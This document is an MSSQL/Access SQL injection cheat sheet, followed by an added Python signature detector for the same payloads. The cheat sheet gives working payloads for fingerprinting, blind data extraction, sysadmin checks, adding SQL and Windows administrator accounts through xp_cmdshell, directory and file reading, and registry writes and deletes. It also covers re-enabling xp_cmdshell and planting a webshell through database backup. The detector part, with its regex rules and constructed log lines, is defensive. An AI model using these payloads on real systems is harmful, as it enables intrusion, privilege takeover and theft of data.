1. Judging whether there is an injection point:
   ; and 1=1
   ; and 1=2
2. Preliminary judgment that the backend is MSSQL:
   ; and user>0
3. Judging which database system is in use:
   ; and (select count(*) from sysobjects)>0     (MSSQL)
   ; and (select count(*) from msysobjects)>0    (Access)
4. When the injected parameter is a string:
   ' and [query condition] and ''='
5. For search parameters (the value is URL-encoded, so %25 decodes to a literal %):
   ' and [query condition] and '%25'='
6. Guess the table name:
   ; and (select count(*) from [table name])>0
7. Guess the field name:
   ; and (select count([field name]) from [table name])>0
8. Guess the record length of a field:
   ; and (select top 1 len([field name]) from [table name])>0
9. Guess the ASCII value of a field, one character at a time:
   (1) Access:
       ; and (select top 1 asc(mid([field name],1,1)) from [table name])>0
   (2) MSSQL:
       ; and (select top 1 unicode(substring([field name],1,1)) from [table name])>0
10. Test the permission structure (MSSQL):
   ; and 1=(select is_srvrolemember('sysadmin'));--
   ; and 1=(select is_srvrolemember('serveradmin'));--
   ; and 1=(select is_srvrolemember('[role name]'));--
   ; and 1=(select is_srvrolemember('[role name]'));--
   ; and 1=(select is_srvrolemember('diskadmin'));--
   ; and 1=(select is_srvrolemember('bulkadmin'));--
   ; and 1=(select is_member('db_owner'));
11. Add an MSSQL login and a Windows account:
   ; exec master.dbo.sp_addlogin [username];--
   ; exec master.dbo.sp_password null,[password],[username];--
   ; exec master.dbo.sp_addsrvrolemember [username],sysadmin;--
   ; exec master.dbo.xp_cmdshell 'net user [username] [password] /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
   ; exec master.dbo.xp_cmdshell 'net user [username] [password] /add';--
   ; exec master.dbo.xp_cmdshell 'net localgroup administrators [username] /add';--
12. Traverse directories:
   (1) ; create table dirs(paths varchar(100), id int)
       ; insert dirs exec master.dbo.xp_dirtree 'c:\'
       ; and (select top 1 paths from dirs)>0
       ; and (select top 1 paths from dirs where paths not in('[known paths]'))>0
   (2) ; create table temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
       ; insert temp exec master.dbo.xp_availablemedia;--                     get all current drives
       ; insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--              get the subdirectory list
       ; insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--         get the whole directory tree
       ; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   view the contents of a file
13. MSSQL registry stored procedures:
   xp_regenumvalues root key, subkey: returns every value name and value under the key
       exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
   xp_regread root key, subkey, value name: returns the value
       exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
   xp_regwrite root key, subkey, value name, value type, value: writes into the registry (value type reg_sz is a string, reg_dword an integer)
       exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
   xp_regdeletevalue root key, subkey, value name: deletes a value
       exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
   xp_regdeletekey root key, subkey: deletes the key, including all values under it
       exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
14. MSSQL backup used to create a WebShell (the script body between the quotes is missing from this page):
   use model
   create table cmd(str image);
   insert into cmd(str) values('
   ');
   backup database model to disk='c:\l.asp';
15. MSSQL built-in functions:
   ; and (select @@version)>0       returns the SQL Server version string, which also names the Windows version
   ; and user_name()='dbo'          tests whether the user the current system connects with is sa
   ; and (select user_name())>0     leaks the user the system connects with
   ; and (select db_name())>0       leaks the currently connected database
16. Simple WebShell (the script body between the quotes is missing from this page, as in item 14):
   use model
   create table cmd(str image);
   insert into cmd(str) values('
   ');
   backup database model to disk='g:\wwward\l.asp';
   It is then requested like this: http://ip/l.asp?c=dir
Prerequisites. Required tools: SQL Query Analyzer and SQLEXEC Sunx Version
1. To remove the xp_cmdshell extended stored procedure, use the following statement:
   if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
       exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2. To add the xp_cmdshell extended stored procedure back, use the following statement:
   (1) SQL Query Analyzer:
       sp_addextendedproc xp_cmdshell, @dllname='xplog70.dll'
   (2) SQLEXEC Sunx Version: first fill in %s in the Format option, then enter in the CMD option:
       sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
       Removal:
       sp_dropextendedproc 'xp_cmdshell'
   (3) MSSQL 2000:
       sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
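The items above are exactly the strings a defender wants to alert on. The following is an added example, not part of the original cheat sheet: a small Python detector that runs one signature per payload family (items 1 to 16 plus the sp_addextendedproc / sp_dropextendedproc statements in this section) over web access-log lines and over SQL Server audit text. The rule names are hypothetical, and the sample log lines are constructed for the example. It URL-decodes repeatedly before matching, because the search-parameter form in item 5 only becomes a literal % on the second decoding round, and it lower-cases and collapses whitespace so case and spacing variations do not slip past the rules.

```python
"""Signature detection for the MSSQL/Access injection probes and the
post-exploitation statements listed above, run over web access-log lines
and SQL Server audit text. Added example, not part of the original cheat
sheet; rule names are hypothetical and the sample lines are constructed."""
import re
from urllib.parse import unquote_plus

# One regex per payload family from the cheat sheet (items 1-16 and the
# xp_cmdshell add/drop statements). They run over decoded, lower-cased,
# whitespace-collapsed text, so case and spacing tricks do not evade them.
RULES = [
    ("boolean-probe", r"\band\s+1\s*=\s*[12]\b"),                          # item 1
    ("string-context-probe", r"'\s*and\s+'[^']*'\s*=\s*'"),                 # items 4-5
    ("dbms-fingerprint", r"\bm?sysobjects?\b|\buser\s*>\s*0"),              # items 2-3
    ("blind-enum", r"\b(?:asc|unicode)\s*\(\s*(?:mid|substring)\s*\(|\btop\s+1\s+len\s*\("),  # items 8-9
    ("role-check", r"\bis_(?:srvrole)?member\s*\("),                        # item 10
    ("account-tamper", r"\bsp_(?:addlogin|password|addsrvrolemember)\b"),   # item 11
    ("os-command", r"\bxp_cmdshell\b|\bnet\s+(?:user|localgroup)\b"),       # items 11-12
    ("fs-enum", r"\bxp_(?:dirtree|subdirs|availablemedia)\b"),              # item 12
    ("registry", r"\bxp_reg(?:read|write|enumvalues|deletevalue|deletekey)\b"),  # item 13
    ("backup-webshell", r"\bbackup\s+database\s+model\s+to\s+disk\b"),      # items 14, 16
    ("extproc-tamper", r"\bsp_(?:add|drop)extendedproc\b"),                 # xp_cmdshell add/drop
]
COMPILED = [(name, re.compile(pattern)) for name, pattern in RULES]


def normalize(text: str, max_rounds: int = 3) -> str:
    """URL-decode until the text stops changing (item 5's '%25' only becomes
    a literal '%' on the second round), then lower-case and collapse spaces."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).lower()


def classify(line: str) -> list:
    """Names of every rule that fires on one access-log or audit line."""
    text = normalize(line)
    return [name for name, rx in COMPILED if rx.search(text)]


def scan(lines) -> list:
    """(index, matched rule names) for each line that fires at least one rule."""
    hits = []
    for i, line in enumerate(lines):
        names = classify(line)
        if names:
            hits.append((i, names))
    return hits


# Constructed sample access-log lines (combined log format) for a page that
# takes a numeric id; the first four carry probes from the cheat sheet.
ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.asp?id=1;and%201=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=1%27%20and%20%27%2525%27=%27 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=1;and%201=(select%20is_srvrolemember(%27sysadmin%27))-- HTTP/1.1" 500 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=1;exec%20master.dbo.xp_cmdshell%20%27net%20user%20x%20y%20/add%27-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=42 HTTP/1.1" 200 2048',
]

# Constructed SQL audit text (timestamp, login, statement) as a log shipper
# might export it; the first two lines are the statements from the section
# on xp_cmdshell and from items 14/16, the third is benign.
SQL_AUDIT = [
    "2024-01-01 10:05:00 sa  exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'",
    "2024-01-01 10:06:00 app backup database model to disk='c:\\inetpub\\l.asp'",
    "2024-01-01 10:07:00 app select name from sys.tables where name='orders'",
]

if __name__ == "__main__":
    for label, lines in (("access log", ACCESS_LOG), ("sql audit", SQL_AUDIT)):
        for index, names in scan(lines):
            print(f"{label} line {index}: {', '.join(names)}")
```

The rules are deliberately narrow (the net user / net localgroup and top 1 len( patterns are the ones most likely to fire on legitimate traffic, so tune them per site), and the benign lines in both samples are there to confirm they stay quiet. A hit on backup-webshell or extproc-tamper from a SQL login other than a DBA's is worth an immediate look at the model database and at sys.configurations for xp_cmdshell, since those are the traces items 14, 16 and this section leave behind.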